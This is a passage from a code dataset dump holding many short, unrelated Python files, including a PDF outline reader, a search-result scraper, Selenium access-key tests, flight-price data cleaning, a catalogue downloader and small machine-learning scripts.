return old_embeddings\n\n if not isinstance(old_embeddings, nn.Embedding):\n raise TypeError(\n f\"Old embeddings are of type {type(old_embeddings)}, which is not an instance of {nn.Embedding}.\"\n f\"You should either use a different resize function or make sure that `old_embeddings` are an instance of {nn.Embedding}.\"\n )\n\n # Build new embeddings\n new_embeddings = nn.Embedding(new_num_tokens, old_embedding_dim).to(\n self.device, dtype=old_embeddings.weight.dtype\n )\n\n # initialize all new embeddings (in particular added tokens)\n self._init_text_weights(new_embeddings)\n\n # Copy token embeddings from the previous weights\n\n # numbers of tokens to copy\n n = min(old_num_tokens, new_num_tokens)\n new_embeddings.weight.data[:n, :] = old_embeddings.weight.data[:n, :]\n\n return new_embeddings","sub_path":"src/deepke/relation_extraction/multimodal/models/modeling_IFA.py","file_name":"modeling_IFA.py","file_ext":"py","file_size_in_byte":35007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"329190699","text":"#! python3\nfrom sys import argv\nfrom pdfminer.pdfparser import PDFParser\nfrom pdfminer.pdfdocument import PDFDocument\n\ndef get_toc(pdf_path):\n infile = open(pdf_path, 'rb')\n parser = PDFParser(infile)\n document = PDFDocument(parser)\n\n toc = list()\n for (level,title,dest,a,structelem) in document.get_outlines():\n toc.append((level, title))\n\n return toc\n\nprint(get_toc(argv[1]))","sub_path":"pdf2txt.py","file_name":"pdf2txt.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"570628837","text":"import requests\nfrom bs4 import BeautifulSoup\n\n##Commit 1\n\nresults = []\n\ndef extractUrl(text):\n html = str(text)\n startIndex = str(text).find(\"http\")\n\n endIndex = 0\n i = 0\n\n while(endIndex == 0):\n if (html[startIndex + i] == \"\\\"\") or (html[startIndex + i] == \"&\"):\n endIndex = startIndex + i\n else:\n i = i + 1\n\n\n return (html[startIndex:endIndex])\n\n\ndef getTitle(url):\n request = requests.get(url)\n parser = BeautifulSoup(request.text, 'html.parser')\n return parser.title.text\n\ndef traverse(index):\n query = input(\"Is this what you're looking for? [y/n] \\n\" + getTitle(results[index]) + \"\\n\" + \"Response: \")\n\n if query == \"y\":\n return (results[index])\n elif query == \"n\":\n if(index + 1 < len(results)):\n traverse(index + 1)\n elif query == \"exit\":\n return(\"bet\")\n\ndef start(name):\n #Command Line Input\n #name = input(\"Query: \")\n\n fill = name.replace(\" \", \"+\")\n\n page = requests.get('https://www.google.com/search?q=' + fill)\n\n try:\n soup = BeautifulSoup(page.text, 'html.parser')\n for link in soup.find_all(class_='g'):\n results.append(extractUrl(str(link)))\n\n return results\n #Uncoment for command line input\n #print(traverse(0))\n except:\n print(\"Done\")\n","sub_path":"crawl.py","file_name":"crawl.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"185780067","text":"from selenium import webdriver\nimport unittest\nfrom selenium.webdriver.common.by import By\nfrom loginpage import LoginPage\nfrom driver import WebDriver\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\nfrom groups import Groups\nfrom users import Users\nfrom accesskeys import Keys\ncommand_executor = \"http://127.0.0.1:4444/wd/hub\"\nimport time\nimport common\nimport base\n\nclass KeyTest(unittest.TestCase):\n\n\tdef setUp(self):\n\t\tself.driver = WebDriver(desired_capabilities=DesiredCapabilities.CHROME,command_executor=command_executor)\n\t\tself.driver.get(common.URL)\n\t\tlogin_page = LoginPage(self.driver).open()\n\t\tlogin_page.login(common.USERNAME,common.PASSWORD)\n\t\tself.users_page = Users(self.driver)\n\t\tself.groups_page = Groups(self.driver).open()\n\t\tself.key_page = Keys(self.driver).open()\n\t\tprint('Welcome to Wasabi Access Keys page tests')\n\n\tdef test_create_key(self):\n\t\tprint(\"Create Key\")\n\n\t\taccessKey , secretKey = self.key_page.createKey()\n\n\t\ttable = self.key_page.getKeys()\n\n\t\tself.assertIsNotNone(accessKey in table, 'accessKey does not exist')\n\n\tdef test_delete_key(self):\n\t\tprint(\"Delete a specific key\")\n\n\t\taccessKey , secretKey = self.key_page.createKey()\n\t\taccessKey , secretKey = self.key_page.createKey()\n\n\t\tself.key_page.deleteKey(accessKey)\n\n\t\ttable = self.key_page.getKeys()\n\t\tself.assertIsNotNone(accessKey not in table, 'accessKey does exist')\n\n\tdef test_get_user_key(self):\n\t\tprint(\"get keys that belong to bolak2\")\t\n\n\t\tself.users_page.open()\n\t\taccessKey , secretKey = self.users_page.createUser('bolak2','API')\n\n\t\tself.key_page.open()\n\t\ttable = self.key_page.getUserKeys('bolak2')\n\n\t\tself.assertIsNotNone(accessKey in table, 'accessKey does not exist')\n\n\tdef test_delete_user_deletes_key(self):\n\t\tprint(\"Check if deleting bolak2 deletes its key\")\t\n\n\t\tself.users_page.open()\n\t\taccessKey , secretKey = self.users_page.createUser('bolak2','API')\n\t\tself.users_page.deleteUser('bolak2')\n\n\t\tself.key_page.open()\n\t\ttable = self.key_page.getKeys()\n\n\t\tself.assertIsNotNone(accessKey not in table, 'accessKey does exist')\t\t\t\t\n\t\t\t\t\n\t\n\n\tdef tearDown(self):\n\t\tself.key_page.deleteAllKeys()\n\t\tself.groups_page.deleteAllGroups()\n\t\tself.users_page.deleteAllUsers()\n\t\tself.driver.close()\n\nif __name__ == \"__main__\":\n\tunittest.main()\n","sub_path":"po/test_accesskeys.py","file_name":"test_accesskeys.py","file_ext":"py","file_size_in_byte":2265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"73853924","text":"import pandas as pd\nimport numpy as np\nfrom utils.utils import transf_duration\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.feature_selection import VarianceThreshold\nfrom map import *\n\ndef clean_data(big_df):\n #Handling null values\n big_df['Total_Stops'] = big_df['Total_Stops'].fillna(value=big_df['Total_Stops'].mode()[0])\n big_df['Route'] = big_df['Route'].fillna(value=big_df['Route'].mode()[0])\n\n #Seperating Date_of_Journey column into date, month and year\n big_df['Date'] = big_df['Date_of_Journey'].str.split('/').str[0].astype(int)\n big_df['Month'] = big_df['Date_of_Journey'].str.split('/').str[1].astype(int)\n big_df['Year'] = big_df['Date_of_Journey'].str.split('/').str[2].astype(int)\n big_df.drop(['Date_of_Journey'],axis=1,inplace=True)\n\n #Extracting only the time part from Arrival_time feature\n big_df['Arrival_Time'] = big_df['Arrival_Time'].str.split(' ').str[0]\n\n #Seperating Arrival Time into Arrival Hour and Arrival minute\n big_df['Arrival_Hour'] = big_df['Arrival_Time'].str.split(':').str[0].astype(int)\n big_df['Arrival_Minute'] = big_df['Arrival_Time'].str.split(':').str[1].astype(int)\n\n #Seperating Departure time into Departure hour and Departure minute\n big_df['Departure_Hour'] = big_df['Dep_Time'].str.split(':').str[0].astype(int)\n big_df['Departure_Minute'] = big_df['Dep_Time'].str.split(':').str[1].astype(int)\n\n #Dropping the Arrival/Departure Time\n big_df.drop(['Arrival_Time','Dep_Time'],axis=1,inplace=True)\n\n #Handling route column\n big_df['Route_1'] = big_df['Route'].str.split('→ ').str[0] # Seperating route parameter into different columns\n big_df['Route_2'] = big_df['Route'].str.split('→ ').str[1]\n big_df['Route_3'] = big_df['Route'].str.split('→ ').str[2]\n big_df['Route_4'] = big_df['Route'].str.split('→ ').str[3]\n big_df['Route_5'] = big_df['Route'].str.split('→ ').str[4]\n\n big_df['Route_1'].fillna(\"None\", inplace=True) # Handling null values in the newly created\n big_df['Route_2'].fillna(\"None\", inplace=True)\n big_df['Route_3'].fillna(\"None\", inplace=True)\n big_df['Route_4'].fillna(\"None\", inplace=True)\n big_df['Route_5'].fillna(\"None\", inplace=True)\n\n #Dropping the original Route column\n big_df.drop(['Route'],axis=1,inplace=True)\n\n #Converting Duration into minutes\n big_df['Duration'] = big_df['Duration'].apply(transf_duration)\n\n return big_df\n\ndef encode_categorical(cleaned_data):\n cleaned_data['Route_1'] = cleaned_data['Route_1'].str.strip()\n cleaned_data['Route_2'] = cleaned_data['Route_2'].str.strip()\n cleaned_data['Route_3'] = cleaned_data['Route_3'].str.strip()\n cleaned_data['Route_4'] = cleaned_data['Route_4'].str.strip()\n cleaned_data['Route_5'] = cleaned_data['Route_5'].str.strip()\n\n #Encoding categorical variables using label encoding because there is some rank associated with them\n cleaned_data['Airline'] = cleaned_data['Airline'].map(dic_airline)\n cleaned_data['Source'] = cleaned_data['Source'].map(dic_source)\n cleaned_data['Destination'] = cleaned_data['Destination'].map(dic_destination)\n cleaned_data['Total_Stops'] = cleaned_data['Total_Stops'].map(dic_totalstops)\n cleaned_data['Additional_Info'] = cleaned_data['Additional_Info'].map(dic_addinfo)\n cleaned_data['Route_1'] = cleaned_data['Route_1'].map(dic_route1)\n cleaned_data['Route_2'] = cleaned_data['Route_2'].map(dic_route2)\n cleaned_data['Route_3'] = cleaned_data['Route_3'].map(dic_route3)\n cleaned_data['Route_4'] = cleaned_data['Route_4'].map(dic_route4)\n cleaned_data['Route_5'] = cleaned_data['Route_5'].map(dic_route5)\n return cleaned_data\n\ndef feature_sel(encoded_data):\n var_thres = VarianceThreshold(threshold=0)\n var_thres.fit(encoded_data)\n constant_columns = [column for column in encoded_data.columns\n if column not in encoded_data.columns[var_thres.get_support()]]\n encoded_data.drop(constant_columns, axis=1, inplace=True)\n return encoded_data","sub_path":"clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":4029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"326368186","text":"from selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import NoSuchElementException, TimeoutException\nfrom selenium.webdriver.common.by import By\nfrom os import makedirs, listdir\nfrom os.path import exists, join\nimport img2pdf\nimport datetime\nimport urllib.request\nimport time\n# History Writer\nfrom download_scripts.history_writer import write_history_to_csv, check_history_in_csv\n\nclass catalogue(object):\n def __init__(self, name, date, url, web_name, save_folder, history_path):\n self.web_name = web_name.replace(\"/\",\" \").replace(\"|\",\" \").replace(\",\",\" \")\n self.name = name.replace(\"/\",\" \").replace(\"|\",\" \").replace(\",\",\" \")\n self.date = date.replace(\"/\",\" \").replace(\"|\",\" \").replace(\",\",\" \")\n self.url = url\n self.save_folder = save_folder\n self.history_path = history_path\n \n def __str__(self):\n return self.name + \" - \" + self.date + \" : \" + self.url\n \n def set_driver(self, web_driver):\n self.web_driver = web_driver\n \n def get_images(self):\n self.web_driver.get(self.url)\n \n date = self.web_driver.find_element_by_xpath(\"//p[@class='infoContainer__date']\")\n self.date = date.text.replace(\"/\",\"\")\n result_check = False\n while result_check == False:\n result_check = self.download_images()\n\n def download_images(self):\n img_folder = self.save_folder + \"/\" + self.web_name + \"/\" + self.date + \"/\" + self.name + \"/\"\n if check_history_in_csv(self.history_path, self.web_name, img_folder + self.name + \"_\" + self.date + \".pdf\") == False:\n if not exists(img_folder):\n makedirs(img_folder)\n try:\n ad_div = self.web_driver.find_element_by_xpath(\"//div[@class='adOverlay']\")\n self.web_driver.execute_script(\"arguments[0].remove()\",ad_div);\n except:\n pass\n try:\n ad_div = self.web_driver.find_element_by_xpath(\"//div[@class='adContainer isAdPage']\")\n self.web_driver.execute_script(\"arguments[0].remove()\",ad_div);\n except:\n pass\n try:\n ad_div = self.web_driver.find_element_by_xpath(\"//div[@class='inPage ']\")\n self.web_driver.execute_script(\"arguments[0].remove()\",ad_div);\n except:\n pass\n\n img_list = []\n last_page_btn = self.web_driver.find_element_by_xpath(\"//button[@id='lastPageButton']\")\n index = 0\n dup_first_last = False\n\n wait = WebDriverWait(self.web_driver, 5)\n \n max_page = int(self.web_driver.find_element_by_xpath(\"//button[@id='lastPageButton']/span\").text.split(\" / \")[-1])\n \n while last_page_btn != None:\n try:\n last_page_btn = self.web_driver.find_element_by_xpath(\"//button[@id='lastPageButton']\")\n except:\n last_page_btn = None\n try:\n first_page_btn = self.web_driver.find_element_by_xpath(\"//button[@id='firstPageButton']\")\n except:\n first_page_btn = None\n\n if first_page_btn == None:\n cata_page = wait.until(EC.presence_of_element_located((By.XPATH, \"//div[@class='catalog-page page_index_0']\")))\n image = cata_page.find_element_by_xpath(\".//div[@class='responsive-image-wrapper']/img\")\n if image.get_attribute('src') not in img_list and image.get_attribute('src').split(\"/\")[-2] != \"mini\":\n img_list.append(image.get_attribute('src'))\n elif last_page_btn == None:\n cata_page = wait.until(EC.presence_of_element_located((By.XPATH, \"//div[@class='catalog-page page_index_1']\")))\n image = cata_page.find_element_by_xpath(\".//div[@class='responsive-image-wrapper']/img\")\n if image.get_attribute('src') not in img_list and image.get_attribute('src').split(\"/\")[-2] != \"mini\":\n img_list.append(image.get_attribute('src'))\n if image.get_attribute('src') == img_list[0]:\n dup_first_last = True\n break\n else:\n cata_page = wait.until(EC.presence_of_element_located((By.XPATH, \"//div[@class='catalog-page page_index_1']\")))\n images = cata_page.find_elements_by_xpath(\".//div[@class='responsive-image-wrapper']/img\")\n for image in images:\n if image.get_attribute('src') not in img_list and image.get_attribute('src').split(\"/\")[-2] != \"mini\":\n img_list.append(image.get_attribute('src'))\n \n time.sleep(3.5)\n next_page_btn = self.web_driver.find_element_by_xpath(\"//button[@id='nextPageButton']\")\n next_page_btn.click()\n\n for img_url in img_list:\n img_path = img_folder + \"page_\" + str(index).rjust(3, '0') + \".jpg\"\n index += 1\n urllib.request.urlretrieve(img_url, img_path)\n\n time.sleep(3)\n self.images_to_pdf(img_folder)\n else:\n return None\n \n if dup_first_last == False:\n if index != max_page:\n print(\"--------{0}--------\".format(self.web_name))\n print(\" \".join([self.date, self.name]))\n print(\"ERROR: Catalogue is not full of pages !!!\")\n print(\"Catalogue: {0} pages\".format(max_page))\n print(\"Downloaded: {0} pages\".format(index))\n result_check = False\n else:\n write_history_to_csv(self.history_path, self.web_name, [self.date, self.name, img_folder + self.name + \"_\" + self.date + \".pdf\"])\n result_check = True\n else:\n if (index + 1) != max_page:\n print(\"--------{0}--------\".format(self.web_name))\n print(\" \".join([self.date, self.name]))\n print(\"ERROR: Catalogue is not full of pages !!!\")\n print(\"Catalogue: {0} pages\".format(max_page))\n print(\"Downloaded: {0} pages\".format(index))\n result_check = False\n else:\n write_history_to_csv(self.history_path, self.web_name, [self.date, self.name, img_folder + self.name + \"_\" + self.date + \".pdf\"])\n result_check = True\n return result_check\n\n def images_to_pdf(self, img_folder):\n with open(img_folder + self.name + \"_\" + self.date + \".pdf\", \"wb\") as pdf_file:\n pdf_file.write(img2pdf.convert([img_folder + i for i in listdir(img_folder) if i.endswith(\".jpg\")]))\n\nclass web_spider(object): \n def __init__(self, web_driver, web_url, web_name, save_folder, scrsh_folder, keyword, history_path):\n self.web_driver = web_driver\n self.web_url = web_url\n self.web_name = web_name\n self.save_folder = save_folder\n self.scrsh_folder = scrsh_folder\n self.keyword = keyword\n self.history_path = history_path\n \n def get_catalogue(self):\n self.web_driver.get(self.web_url)\n self.take_screenshot()\n \n try:\n cookie_btn = self.web_driver.find_element_by_xpath(\"//button[@id='cookiesModal_bottom_accept']\")\n cookie_btn.click()\n except:\n pass\n \n catalogue_list = self.web_driver.find_elements_by_xpath(\"//ul[@class='s·city-result__container-catalogs']/li\")\n \n if len(catalogue_list) > 0:\n cata_list = []\n for catalogue_src in catalogue_list:\n try:\n c_name = catalogue_src.find_element_by_xpath(\".//div[@class='c·catalog__description hide-link-find']/h3\").text\n if self.keyword in c_name.lower().strip():\n c_date = \"No Date\"\n c_url = \"https://www.tiendeo.com.au/\" + catalogue_src.find_element_by_xpath(\".//div[@class='c·catalog__bottom']/a\").get_attribute('data-link')\n new_catalogue = catalogue(c_name, c_date, c_url, self.web_name, self.save_folder, self.history_path)\n cata_list.append(new_catalogue)\n except:\n continue\n \n for cata in cata_list:\n cata.set_driver(self.web_driver)\n cata.get_images()\n else:\n try:\n c_name = self.web_driver.find_element_by_xpath(\"//div[@class='c·catalog__description hide-link-find']/h3\").text\n if self.keyword in c_name.lower().strip():\n c_date = \"No Date\"\n c_url = \"https://www.tiendeo.com.au/\" + self.web_driver.find_element_by_xpath(\"//div[@class='c·catalog__bottom']/a\").get_attribute('data-link')\n new_catalogue = catalogue(c_name, c_date, c_url, self.web_name, self.save_folder, self.history_path)\n new_catalogue.set_driver(self.web_driver)\n new_catalogue.get_images()\n except:\n pass\n \n def take_screenshot(self):\n self.web_driver.get_screenshot_as_file(join(self.scrsh_folder, self.web_name + \"_\" + str(datetime.datetime.now().date()) + \".png\"))","sub_path":"download_scripts/tiendeo_dl.py","file_name":"tiendeo_dl.py","file_ext":"py","file_size_in_byte":9500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"31970122","text":"# -*- coding: utf-8 -*-\n##############################################################################\n# Copyright (c) 2021-Present IjVine Corporation ()\n\n##############################################################################\nfrom odoo import fields,models\n\n\nclass ResPartner(models.Model):\n\t_inherit = 'res.partner'\n\n\tchannel_mapping_ids = fields.One2many(\n\t\tstring = 'Mappings',\n\t\tcomodel_name = 'channel.partner.mappings',\n\t\tinverse_name = 'odoo_partner',\n\t\tcopy = False\n\t)\n","sub_path":"ijvine_ebay_base/models/core/res_partner.py","file_name":"res_partner.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"157424201","text":"\nimport libs.primes as p\n\ntrinum = 1\nnum = 1\n\nwhile True:\n numdivs = p.numDivisors(trinum)\n\n if numdivs>500:\n print(\"Num: \", num, \" Trinum: \", trinum, \" Divs: \", numdivs)\n break\n\n num += 1\n trinum += num\n\nprint(trinum)\n\n","sub_path":"12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"544447613","text":"import os\nimport json\n\n#permet d'indiquer, si la structure de dossier existe deja, l'arborescence de celle-ci\ndef print_structure(adresse_json):\n\twith open(adresse_json, 'r') as f:\n\t\tstructure_json = json.load(f)\n\t\tprint('Les dossiers ont deja ete cree')\n\t\tprint('Voici l\\'arborescence des dossiers :')\n\t\tfor key, values in structure_json.items():\n\t\t\tprint ('. {0}'.format(key))\n\t\t\tfor value in values:\n\t\t\t\tprint('--- {0}'.format(value))\n\n\t\t\tprint('')\n\t\t\tprint('_'*30)\n\n\n\n#creation des dossiers selon l'arborescence du dictionnaire\ndef structure_dossier (dictionnaire):\n\tfor key, values in dictionnaire.items():\n\t\tfor value in values:\n\t\t\tdossier = '{0}/{1}/{2}'.format(adresse_base, key, value)\n\t\t\tos.makedirs(dossier)\n\t\t\tprint('Creation du dossier : {0}'.format(dossier))\n\n\n#creation et ecriture du fichier json∏\ndef ecriture_json (fichier_json, dictionnaire):\n\twith open (fichier_json, 'w') as f:\n\t\tjson.dump(dictionnaire, f, indent=4)\n\n\n\n\n\"\"\"saisie des differentes adresses et creation de variables les contenant\"\"\"\nadresse_base = r'\\Users\\ruidasilva\\Desktop\\Structure'\nadresse_base = adresse_base.replace('\\\\', '/')\n\nadresse_json = r'\\Users\\ruidasilva\\Desktop\\Structure\\structure.json'\nadresse_json = adresse_json.replace('\\\\', '/')\n\n\n\n#structure souhaite des dossiers\nstructure = { \n\t\t\t'cle1' : ['valeur1', 'valeur2', 'valeur3'],\n\t\t\t'cle2' : ['valeur4', 'valeur5', 'valeur6'],\n\t\t\t'cle3' : ['valeur7', 'valeur8', 'valeur9']\n\t\t\t}\n\n\n\n#si le fichier json est déja existant et généré avec l'arborescence souhaité\nif os.path.isfile(adresse_json):\n\tprint_structure(adresse_json)\n\n\n#sinon appel des fonction et execution de celles ci\nelse:\n\tstructure_dossier (structure)\n\tecriture_json (adresse_json, structure)\n","sub_path":"03_structure_de_dossiers.py","file_name":"03_structure_de_dossiers.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"347678945","text":"'''\nSource : https://leetcode.com/problems/binary-tree-preorder-traversal/\nAuthor : Yuan Wang\nDate : 2018-07-30\n\n/********************************************************************************** \n*Given a binary tree, return the preorder traversal of its nodes' values.\n*\n*Example:\n*\n*Input: [1,null,2,3]\n* 1\n*\t\\\n*\t 2\n*\t/\n* 3\n*\n*Output: [1,2,3]\n**********************************************************************************/\n'''\n\n# Definition for a binary tree node.\n# class TreeNode:\n#\t def __init__(self, x):\n#\t self.val = x\n#\t self.left = None\n#\t self.right = None\n\n#Recursively\ndef preorderTraversal(self, root):\n\t\t\"\"\"\n\t\t:type root: TreeNode\n\t\t:rtype: List[int]\n\t\t\"\"\"\n\t\treturn self.printPreorder(root,[])\n\t\ndef printPreorder(self,root,lst):\n\tif root:\n\t\tlst.append(root.val)\n\t\tself.printPreorder(root.left,lst)\n\t\tself.printPreorder(root.right,lst)\n\t\n\treturn lst\n\n#Iteratively\ndef preorderTraversal(self, root):\n\t\"\"\"\n\t:type root: TreeNode\n\t:rtype: List[int]\n\t\"\"\"\n\t# stack storing right nodes\n\trightNodes = []\n\t\n\tresult = []\n\t\n\tcur = root\n\t\n\twhile cur:\n\t\tresult.append(cur.val)\n\t\tif cur.right:\n\t\t\trightNodes.append(cur.right)\n\t\n\t\tcur = cur.left\n\t\tif not cur and len(rightNodes)!= 0:\n\t\t\tcur = rightNodes.pop()\n\t\n\t\n\treturn result\t","sub_path":"Tree/preorderTraversal.py","file_name":"preorderTraversal.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"505791911","text":"import os \nos.chdir(\"/home/vk001716/Desktop/bose_dell\")\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport torch.optim as optim \nimport pandas as pd\nimport random\nimport model as m\n\nclass model(nn.Module):\n \n def __init__(self):\n super(model , self ).__init__()\n self.layers = nn.Sequential(\n nn.Linear(36, 72),\n nn.ReLU(),\n nn.Linear(72, 144),\n nn.ReLU(),\n nn.Linear(144, 36),\n nn.ReLU(),\n nn.Linear(36, 18),\n nn.ReLU(),\n nn.Linear(18 , 9),\n nn.ReLU(),\n nn.Linear(9 , 1), \n nn.Sigmoid())\n \n \n def forward(self , x ):\n\n return self.layers(x)\n\n\n\nclass master_model(nn.Module):\n \n def __init__(self):\n \n super(master_model ,self ).__init__()\n self.layers = nn.Sequential(\n nn.Linear(2 , 11),\n nn.ReLU(),\n nn.Linear(11 , 22),\n nn.ReLU(),\n nn.Linear(22 , 44),\n nn.ReLU(),\n nn.Linear(44 , 88),\n nn.ReLU(),\n nn.Linear(88 , 44),\n nn.Softmax()\n )\n \n \n def forward ( self , x ):\n return self.layers( x )\n\ndef encode_locations(loc = None):\n encode = [0 for i in range(34)]\n flag = False\n for i in range(len(locations)):\n if locations[i] == loc :\n flag = True\n break\n if flag :\n encode[i] = 1\n return encode\n\nmodels = []\nmain_model = master_model()\nmain_model.load_state_dict(torch.load('main_model_saved.pkl'))\nmain_model.eval()\nfor i in range(10):\n mod = model()\n mod.load_state_dict(torch.load('saved_state_of_logistic{0}.pkl'.format(i+1)))\n mod.eval()\n models.append(mod)\nlocations = pd.read_csv('location.csv' , header = None).values.tolist()[0]\nratings = pd.read_csv('rating.csv' , header = None).values.tolist()[0]\n\n\ndef predict_logistic(y):\n # input as 'logisticnumber,price,city/optional'\n y = list(y.split(\",\"))\n logistic_number =int( y[0]) - 1\n del(y[0])\n if len(y) == 1 :\n y.append(None)\n input = []\n input.append(int(y[0]) / 312499)\n input.extend(encode_locations(y[1]))\n input.append(ratings[logistic_number] / 5)\n input = Variable(torch.FloatTensor(input))\n pred = models[logistic_number].forward(input)\n pred = pred.data.tolist()\n pred = str(int(pred[0] * 120))\n return pred\n\n\ndef predict_main(x):\n #x has value as price\n price = int(x)\n x = price/312499\n input = []\n input.append(x) #price\n input.append(ratings[random.randint(0 , 9)] / 5)\n input = Variable(torch.FloatTensor(input))\n pred = main_model.forward(input)\n pred = pred.data.tolist()\n location = pred[0 : 34]\n logistic = pred[34 :]\n _ , l ,pred = m.mod(location , logistic)\n loc ,_ , log = m.mod(location , logistic)\n location = locations[loc]\n logistic = log\n response = '{0},{1},{2}'.format(location , logistic + 1 , predict_logistic(str('{0},{1},{2} '.format(logistic , price ,location ))))\n return response ","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":3355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"190387278","text":"from sklearn.ensemble import RandomForestClassifier\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nimport pandas as pd\nfrom statistics import mean\n\ndf = pd.read_csv('page_by_page3.csv')\n#print(df)\n\nX_vars = list(df.loc[:, 'innovation':'against network neutrality'])\nX = df[X_vars]\ny = df['NN']\n\navg_accuracy_list = [0] * 100\nfor j in range(0, 100):\n\n\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2)\n\n clf = RandomForestClassifier(n_jobs=2, random_state=0)\n clf.fit(X_train, y_train)\n\n preds = clf.predict(X_test)\n\n y_test = y_test.to_frame()\n ans_list = y_test['NN'].values.tolist()\n\n count = 0\n for i in range(0, len(preds)):\n if preds[i] == ans_list[i]:\n count += 1\n avg_accuracy_list[j] = count/len(preds)\n\nprint(mean(avg_accuracy_list))\n\n\n\n","sub_path":"senior-thesis/build_RF_model.py","file_name":"build_RF_model.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"58879348","text":"from os.path import join\nimport numpy as np\nfrom tensorflow.python.keras.applications.resnet50 import preprocess_input\nfrom tensorflow.python.keras.applications import ResNet50\nfrom tensorflow.python.keras.preprocessing.image import load_img, img_to_array\n\nimage_size = 224\n\ndef read_and_prep_images(img_paths, img_height=image_size, img_width=image_size):\n imgs = [load_img(img_path, target_size=(img_height, img_width)) for img_path in img_paths]\n img_array = np.array([img_to_array(img) for img in imgs])\n return preprocess_input(img_array)\n\n\nif __name__ == \"__main__\":\n hot_dog_image_dir = '../input/hot-dog-not-hot-dog/seefood/train/hot_dog'\n\n hot_dog_paths = [join(hot_dog_image_dir, filename) for filename in\n ['1000288.jpg',\n '127117.jpg']]\n\n not_hot_dog_image_dir = '../input/hot-dog-not-hot-dog/seefood/train/not_hot_dog'\n not_hot_dog_paths = [join(not_hot_dog_image_dir, filename) for filename in\n ['823536.jpg',\n '99890.jpg']]\n\n img_paths = hot_dog_paths + not_hot_dog_paths\n","sub_path":"kaggle_sandbox/tutorial/image_processing/dogs.py","file_name":"dogs.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"73038146","text":"import numpy as np\n\n# Write a function that takes as input a list of numbers, and returns\n# the list of values given by the softmax function.\n\n\ndef softmax(L):\n expL = np.exp(L)\n return np.divide(expL, expL.sum())\n\n\n# e.g. [1, 2, 3, 4]\narr1 = [1, 2, 3, 4]\nout = softmax(arr1)\nprint(\"\\nOutput array : \\n\", out)\n","sub_path":"lesson2-15/solution2_15.py","file_name":"solution2_15.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"587324339","text":"import datetime\n\nfrom project.server.helpers.encrypter import encrypt_password\nfrom project.server.managers.database import db\n\n\nclass Annotation(db.Model):\n \"\"\" Models Model for storing model related details \"\"\"\n __tablename__ = \"ai_annotation\"\n\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n updated_on = db.Column(db.DateTime(), nullable=False)\n image_id = db.Column(db.Integer, db.ForeignKey('ai_image_attribute.id'), unique=True, nullable=False)\n category_id = db.Column(db.String(255), unique=True, nullable=False)\n segmentation = db.Column(db.String(255), unique=True, nullable=False)\n bbox = db.Column(db.String(255), unique=True, nullable=False)\n ignore = db.Column(db.Boolean, unique=True, nullable=False)\n iscrowd = db.Column(db.Boolean, unique=True, nullable=False)\n area = db.Column(db.Integer, unique=True, nullable=False)\n\n def __init__(self, updated_on, image_id, category_id, segmentation, bbox, ignore, iscrowd, area):\n self.updated_on = updated_on\n self.image_id = image_id\n self.category_id = category_id\n self.segmentation = segmentation\n self.bbox = bbox\n self.ignore = ignore\n self.iscrowd = iscrowd\n self.area = area\n\n def from_json(self, json):\n self.id = json.get('user_id', None)\n self.updated_on = json.get('updated_on', None)\n self.image_id = json.get('image_id', None)\n self.category_id = json.get('category_id', None)\n self.segmentation = json.get('segmentation', None)\n self.bbox = json.get('bbox', None)\n self.ignore = json.get('ignore', None)\n self.iscrowd = json.get('iscrowd', None)\n self.area = json.get('area', None)\n return self\n\n def to_dictionary(self):\n obj = {\n 'annotation_id': self.id,\n 'updated_on': self.updated_on,\n 'image_id': self.image_id,\n 'category_id': self.category_id,\n 'segmentation': self.segmentation,\n 'bbox': self.bbox,\n 'ignore': self.ignore,\n 'iscrowd': self.iscrowd,\n 'area': self.area\n }\n return obj","sub_path":"project/server/models/ai_annotation.py","file_name":"ai_annotation.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"175054176","text":"\"\"\" Tests of utilities.\n\n:Author: Jonathan Karr \n:Date: 2016-11-10\n:Copyright: 2016, Karr Lab\n:License: MIT\n\"\"\"\n\nfrom wc_lang.core import (Model, Taxon, Environment, Submodel, SubmodelAlgorithm,\n Compartment,\n SpeciesType, SpeciesTypeType, Species, SpeciesCoefficient, DistributionInitConcentration,\n Reaction, RateLaw, 